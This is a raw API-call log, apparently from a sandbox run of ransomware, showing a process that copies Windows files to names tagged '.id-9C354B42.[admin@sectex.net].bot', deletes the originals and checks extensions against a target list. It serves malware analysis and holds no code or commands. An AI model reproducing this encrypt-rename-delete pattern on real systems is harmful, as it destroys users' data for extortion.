	[0040.191] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.191] SetEndOfFile (hFile=0x1f4) returned 1
	[0040.193] CloseHandle (hObject=0x1f4) returned 1
	[0040.193] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0040.193] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml")) returned 1
	[0040.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76
	[0040.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76
	[0040.193] lstrlenW (lpString=".doc") returned 4
	[0040.193] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.193] lstrlenW (lpString=".docx") returned 5
	[0040.193] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1
	[0040.193] lstrlenW (lpString=".pdf") returned 4
	[0040.193] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.193] lstrlenW (lpString=".xls") returned 4
	[0040.194] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.194] lstrlenW (lpString=".xlsx") returned 5
	[0040.194] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1
	[0040.194] lstrlenW (lpString=".ppt") returned 4
	[0040.194] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76
	[0040.194] lstrlenW (lpString=".zip") returned 4
	[0040.194] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.194] lstrlenW (lpString=".rar") returned 4
	[0040.194] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.194] lstrlenW (lpString=".bz2") returned 4
	[0040.194] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.194] lstrlenW (lpString=".7z") returned 3
	[0040.194] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76
	[0040.194] lstrlenW (lpString=".dbf") returned 4
	[0040.194] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76
	[0040.194] lstrlenW (lpString=".1cd") returned 4
	[0040.194] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76
	[0040.194] lstrlenW (lpString=".jpg") returned 4
	[0040.194] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76
	[0040.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76
	[0040.194] lstrlenW (lpString=".doc") returned 4
	[0040.194] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.194] lstrlenW (lpString=".docx") returned 5
	[0040.194] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1
	[0040.194] lstrlenW (lpString=".pdf") returned 4
	[0040.194] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.194] lstrlenW (lpString=".xls") returned 4
	[0040.195] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.195] lstrlenW (lpString=".xlsx") returned 5
	[0040.195] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1
	[0040.195] lstrlenW (lpString=".ppt") returned 4
	[0040.195] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.195] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76
	[0040.195] lstrlenW (lpString=".zip") returned 4
	[0040.195] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.195] lstrlenW (lpString=".rar") returned 4
	[0040.195] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.195] lstrlenW (lpString=".bz2") returned 4
	[0040.195] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.195] lstrlenW (lpString=".7z") returned 3
	[0040.195] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.195] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76
	[0040.195] lstrlenW (lpString=".dbf") returned 4
	[0040.195] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.195] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76
	[0040.195] lstrlenW (lpString=".1cd") returned 4
	[0040.195] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.195] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76
	[0040.195] lstrlenW (lpString=".jpg") returned 4
	[0040.195] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.195] lstrcmpiW (lpString1=".XSL", lpString2=".bot") returned 1
	[0040.195] lstrlenW (lpString="BASMLA.XSL") returned 10
	[0040.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0040.196] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=227311) returned 1
	[0040.196] CloseHandle (hObject=0x1f4) returned 1
	[0040.196] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl")) returned 0x20
	[0040.196] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.196] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0040.196] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.196] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.196] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0040.197] GetLastError () returned 0x0
	[0040.197] ReadFile (in: hFile=0x1f4, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x377ef, lpOverlapped=0x0) returned 1
	[0040.576] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x377f0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x377f0, lpOverlapped=0x0) returned 1
	[0040.582] ReadFile (in: hFile=0x1f4, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.583] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0040.583] SetEndOfFile (hFile=0x1b0) returned 1
	[0040.583] CloseHandle (hObject=0x1b0) returned 1
	[0040.585] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.586] SetEndOfFile (hFile=0x1f4) returned 1
	[0040.587] CloseHandle (hObject=0x1f4) returned 1
	[0040.588] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0040.588] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl")) returned 1
	[0040.588] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73
	[0040.588] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73
	[0040.588] lstrlenW (lpString=".doc") returned 4
	[0040.588] lstrcmpiW (lpString1=".doc", lpString2=".XSL") returned -1
	[0040.588] lstrlenW (lpString=".docx") returned 5
	[0040.588] lstrcmpiW (lpString1=".docx", lpString2="A.XSL") returned -1
	[0040.588] lstrlenW (lpString=".pdf") returned 4
	[0040.588] lstrcmpiW (lpString1=".pdf", lpString2=".XSL") returned -1
	[0040.588] lstrlenW (lpString=".xls") returned 4
	[0040.588] lstrcmpiW (lpString1=".xls", lpString2=".XSL") returned -1
	[0040.588] lstrlenW (lpString=".xlsx") returned 5
	[0040.588] lstrcmpiW (lpString1=".xlsx", lpString2="A.XSL") returned -1
	[0040.588] lstrlenW (lpString=".ppt") returned 4
	[0040.588] lstrcmpiW (lpString1=".ppt", lpString2=".XSL") returned -1
	[0040.588] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73
	[0040.588] lstrlenW (lpString=".zip") returned 4
	[0040.588] lstrcmpiW (lpString1=".zip", lpString2=".XSL") returned 1
	[0040.589] lstrlenW (lpString=".rar") returned 4
	[0040.589] lstrcmpiW (lpString1=".rar", lpString2=".XSL") returned -1
	[0040.589] lstrlenW (lpString=".bz2") returned 4
	[0040.589] lstrcmpiW (lpString1=".bz2", lpString2=".XSL") returned -1
	[0040.589] lstrlenW (lpString=".7z") returned 3
	[0040.589] lstrcmpiW (lpString1=".7z", lpString2="XSL") returned -1
	[0040.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73
	[0040.589] lstrlenW (lpString=".dbf") returned 4
	[0040.589] lstrcmpiW (lpString1=".dbf", lpString2=".XSL") returned -1
	[0040.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73
	[0040.589] lstrlenW (lpString=".1cd") returned 4
	[0040.589] lstrcmpiW (lpString1=".1cd", lpString2=".XSL") returned -1
	[0040.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73
	[0040.589] lstrlenW (lpString=".jpg") returned 4
	[0040.589] lstrcmpiW (lpString1=".jpg", lpString2=".XSL") returned -1
	[0040.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73
	[0040.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73
	[0040.589] lstrlenW (lpString=".doc") returned 4
	[0040.589] lstrcmpiW (lpString1=".doc", lpString2=".XSL") returned -1
	[0040.589] lstrlenW (lpString=".docx") returned 5
	[0040.589] lstrcmpiW (lpString1=".docx", lpString2="A.XSL") returned -1
	[0040.589] lstrlenW (lpString=".pdf") returned 4
	[0040.589] lstrcmpiW (lpString1=".pdf", lpString2=".XSL") returned -1
	[0040.589] lstrlenW (lpString=".xls") returned 4
	[0040.589] lstrcmpiW (lpString1=".xls", lpString2=".XSL") returned -1
	[0040.589] lstrlenW (lpString=".xlsx") returned 5
	[0040.589] lstrcmpiW (lpString1=".xlsx", lpString2="A.XSL") returned -1
	[0040.589] lstrlenW (lpString=".ppt") returned 4
	[0040.589] lstrcmpiW (lpString1=".ppt", lpString2=".XSL") returned -1
	[0040.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73
	[0040.589] lstrlenW (lpString=".zip") returned 4
	[0040.589] lstrcmpiW (lpString1=".zip", lpString2=".XSL") returned 1
	[0040.589] lstrlenW (lpString=".rar") returned 4
	[0040.590] lstrcmpiW (lpString1=".rar", lpString2=".XSL") returned -1
	[0040.590] lstrlenW (lpString=".bz2") returned 4
	[0040.590] lstrcmpiW (lpString1=".bz2", lpString2=".XSL") returned -1
	[0040.590] lstrlenW (lpString=".7z") returned 3
	[0040.590] lstrcmpiW (lpString1=".7z", lpString2="XSL") returned -1
	[0040.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73
	[0040.590] lstrlenW (lpString=".dbf") returned 4
	[0040.590] lstrcmpiW (lpString1=".dbf", lpString2=".XSL") returned -1
	[0040.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73
	[0040.590] lstrlenW (lpString=".1cd") returned 4
	[0040.590] lstrcmpiW (lpString1=".1cd", lpString2=".XSL") returned -1
	[0040.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73
	[0040.590] lstrlenW (lpString=".jpg") returned 4
	[0040.590] lstrcmpiW (lpString1=".jpg", lpString2=".XSL") returned -1
	[0040.590] lstrcmpiW (lpString1=".emf", lpString2=".bot") returned 1
	[0040.590] lstrlenW (lpString="Graph.emf") returned 9
	[0040.590] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0041.307] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=116724) returned 1
	[0041.307] CloseHandle (hObject=0x1d0) returned 1
	[0041.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf")) returned 0x20
	[0041.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.307] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0041.307] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67
	[0041.307] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67
	[0041.308] lstrlenW (lpString=".doc") returned 4
	[0041.308] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0041.308] lstrlenW (lpString=".docx") returned 5
	[0041.308] lstrcmpiW (lpString1=".docx", lpString2="h.emf") returned -1
	[0041.308] lstrlenW (lpString=".pdf") returned 4
	[0041.308] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0041.308] lstrlenW (lpString=".xls") returned 4
	[0041.308] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0041.308] lstrlenW (lpString=".xlsx") returned 5
	[0041.308] lstrcmpiW (lpString1=".xlsx", lpString2="h.emf") returned -1
	[0041.308] lstrlenW (lpString=".ppt") returned 4
	[0041.308] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0041.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67
	[0041.308] lstrlenW (lpString=".zip") returned 4
	[0041.308] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0041.308] lstrlenW (lpString=".rar") returned 4
	[0041.308] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0041.308] lstrlenW (lpString=".bz2") returned 4
	[0041.308] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0041.308] lstrlenW (lpString=".7z") returned 3
	[0041.308] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0041.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67
	[0041.308] lstrlenW (lpString=".dbf") returned 4
	[0041.308] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0041.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67
	[0041.308] lstrlenW (lpString=".1cd") returned 4
	[0041.308] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0041.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67
	[0041.308] lstrlenW (lpString=".jpg") returned 4
	[0041.308] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0041.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67
	[0041.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67
	[0041.308] lstrlenW (lpString=".doc") returned 4
	[0041.309] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0041.309] lstrlenW (lpString=".docx") returned 5
	[0041.309] lstrcmpiW (lpString1=".docx", lpString2="h.emf") returned -1
	[0041.309] lstrlenW (lpString=".pdf") returned 4
	[0041.309] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0041.309] lstrlenW (lpString=".xls") returned 4
	[0041.309] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0041.309] lstrlenW (lpString=".xlsx") returned 5
	[0041.309] lstrcmpiW (lpString1=".xlsx", lpString2="h.emf") returned -1
	[0041.309] lstrlenW (lpString=".ppt") returned 4
	[0041.309] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0041.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67
	[0041.309] lstrlenW (lpString=".zip") returned 4
	[0041.309] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0041.309] lstrlenW (lpString=".rar") returned 4
	[0041.309] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0041.309] lstrlenW (lpString=".bz2") returned 4
	[0041.309] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0041.309] lstrlenW (lpString=".7z") returned 3
	[0041.309] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0041.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67
	[0041.309] lstrlenW (lpString=".dbf") returned 4
	[0041.309] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0041.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67
	[0041.309] lstrlenW (lpString=".1cd") returned 4
	[0041.309] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0041.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67
	[0041.309] lstrlenW (lpString=".jpg") returned 4
	[0041.309] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0041.309] lstrcmpiW (lpString1=".jpg", lpString2=".bot") returned 1
	[0041.310] lstrlenW (lpString="GreenBubbles.jpg") returned 16
	[0041.310] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0041.310] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=6406) returned 1
	[0041.310] CloseHandle (hObject=0x1d0) returned 1
	[0041.310] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg")) returned 0x20
	[0041.310] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.310] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0041.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74
	[0041.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74
	[0041.310] lstrlenW (lpString=".doc") returned 4
	[0041.310] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0041.310] lstrlenW (lpString=".docx") returned 5
	[0041.310] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1
	[0041.310] lstrlenW (lpString=".pdf") returned 4
	[0041.310] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0041.310] lstrlenW (lpString=".xls") returned 4
	[0041.310] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0041.310] lstrlenW (lpString=".xlsx") returned 5
	[0041.310] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1
	[0041.310] lstrlenW (lpString=".ppt") returned 4
	[0041.310] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0041.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74
	[0041.311] lstrlenW (lpString=".zip") returned 4
	[0041.311] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0041.311] lstrlenW (lpString=".rar") returned 4
	[0041.311] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0041.311] lstrlenW (lpString=".bz2") returned 4
	[0041.311] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0041.311] lstrlenW (lpString=".7z") returned 3
	[0041.311] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0041.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74
	[0041.311] lstrlenW (lpString=".dbf") returned 4
	[0041.311] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0041.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74
	[0041.311] lstrlenW (lpString=".1cd") returned 4
	[0041.311] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0041.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74
	[0041.311] lstrlenW (lpString=".jpg") returned 4
	[0041.311] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0041.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74
	[0041.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74
	[0041.311] lstrlenW (lpString=".doc") returned 4
	[0041.311] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0041.311] lstrlenW (lpString=".docx") returned 5
	[0041.311] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1
	[0041.311] lstrlenW (lpString=".pdf") returned 4
	[0041.311] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0041.311] lstrlenW (lpString=".xls") returned 4
	[0041.311] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0041.311] lstrlenW (lpString=".xlsx") returned 5
	[0041.311] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1
	[0041.311] lstrlenW (lpString=".ppt") returned 4
	[0041.311] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0041.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74
	[0041.311] lstrlenW (lpString=".zip") returned 4
	[0041.312] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0041.312] lstrlenW (lpString=".rar") returned 4
	[0041.312] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0041.312] lstrlenW (lpString=".bz2") returned 4
	[0041.312] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0041.312] lstrlenW (lpString=".7z") returned 3
	[0041.312] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0041.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74
	[0041.312] lstrlenW (lpString=".dbf") returned 4
	[0041.312] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0041.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74
	[0041.312] lstrlenW (lpString=".1cd") returned 4
	[0041.312] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0041.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74
	[0041.312] lstrlenW (lpString=".jpg") returned 4
	[0041.312] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0041.312] lstrcmpiW (lpString1=".wmf", lpString2=".bot") returned 1
	[0041.312] lstrlenW (lpString="grid_(cm).wmf") returned 13
